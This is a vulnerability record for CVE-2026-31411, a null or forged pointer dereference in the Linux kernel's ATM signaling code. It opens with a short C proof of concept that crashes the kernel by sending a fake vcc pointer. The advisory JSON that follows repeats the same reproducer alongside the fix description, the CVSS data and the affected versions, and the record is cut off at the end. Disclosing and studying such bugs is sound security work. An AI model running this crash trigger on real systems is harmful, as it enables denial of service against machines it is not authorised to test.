CVE-2026-31411

#include <sys/socket.h> #include <sys/ioctl.h> // PoC for CVE-2026-31411 // Triggers a kernel crash by sending a fake vcc pointer. int main() { int fd = socket(AF_ATMSVC, SOCK_DGRAM, 0); // Elevate privileges to act as ATM signaling daemon ioctl(fd, ATMSIGD_CTRL); struct iovec iov; struct msghdr msg = {0}; char buf[128] = {0}; // Inject a fake pointer (e.g., 0xdeadbeef) *(unsigned long *)(buf + 4) = 0xdeadbeef; iov.iov_base = buf; iov.iov_len = sizeof(buf); msg.msg_iov = &iov; msg.msg_iovlen = 1; // Kernel dereferences the fake pointer here sendmsg(fd, &msg, 0); return 0; }

{"cve": {"id": "CVE-2026-31411", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-08T14:16:27.977", "lastModified": "2026-05-20T16:03:38.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: atm: fix crash due to unvalidated vcc pointer in sigd_send()\n\nReproducer available at [1].\n\nThe ATM send path (sendmsg -> vcc_sendmsg -> sigd_send) reads the vcc\npointer from msg->vcc and uses it directly without any validation. This\npointer comes from userspace via sendmsg() and can be arbitrarily forged:\n\n int fd = socket(AF_ATMSVC, SOCK_DGRAM, 0);\n ioctl(fd, ATMSIGD_CTRL); // become ATM signaling daemon\n struct msghdr msg = { .msg_iov = &iov, ... };\n *(unsigned long *)(buf + 4) = 0xdeadbeef; // fake vcc pointer\n sendmsg(fd, &msg, 0); // kernel dereferences 0xdeadbeef\n\nIn normal operation, the kernel sends the vcc pointer to the signaling\ndaemon via sigd_enq() when processing operations like connect(), bind(),\nor listen(). The daemon is expected to return the same pointer when\nresponding. However, a malicious daemon can send arbitrary pointer values.\n\nFix this by introducing find_get_vcc() which validates the pointer by\nsearching through vcc_hash (similar to how sigd_close() iterates over\nall VCCs), and acquires a reference via sock_hold() if found.\n\nSince struct atm_vcc embeds struct sock as its first member, they share\nthe same lifetime. Therefore using sock_hold/sock_put is sufficient to\nkeep the vcc alive while it is being used.\n\nNote that there may be a race with sigd_close() which could mark the vcc\nwith various flags (e.g., ATM_VF_RELEASED) after find_get_vcc() returns.\nHowever, sock_hold() guarantees the memory remains valid, so this race\nonly affects the logical state, not memory safety.\n\n[1]: https://gist.github.com/mrpre/1ba5949c45529c511152e2f4c755b0f3"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.12.1", "versionEndExcluding": "5.10.252", "matchCriteriaId": "68B6D2AD-7565-4394-B77B-A1EEBCDF590F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.202", "matchCriteriaId": "4002FC2B-1456-4666-B240-0EBF590C4671"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.165", "matchCriteriaId": "797C7F46-D0BE-4FB8-A502-C5EF8E6B6654"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.128", "matchCriteriaId": "851E9353-6C09-4CC9-877E-E09DB164A3C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.75", "matchCriteriaId": "BCE16369-98ED-41CF-8995-DFDC10B288D2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.14", "matchCriteriaId": "BF463CB7-1F58-4607-B847-77ED23E4B9B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.4", "matchCriteriaId": "672A3E79-EC03-479D-8503-361DFBDC8092"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc2:*:*:*:*:*:*", "matchCriteriaId": "4F76C298-81DC-43E4-8FC9-DC005A2116EF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc3:*:*:*:*:*:*", "matchCriteriaId": "0AB349B2-3F78-4197-882B-90ADB3BF645A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc4:*:*:*:*:*:*", "matchCriteriaId": "6AC88830-A9BC-4607-B572-A4B502FC9FD0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc5:*:*:*:*:*:*", "matchCriteriaId": "476CB3A5-D022-4F13-AAEF-CB6A5785516A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE6 ... (truncated)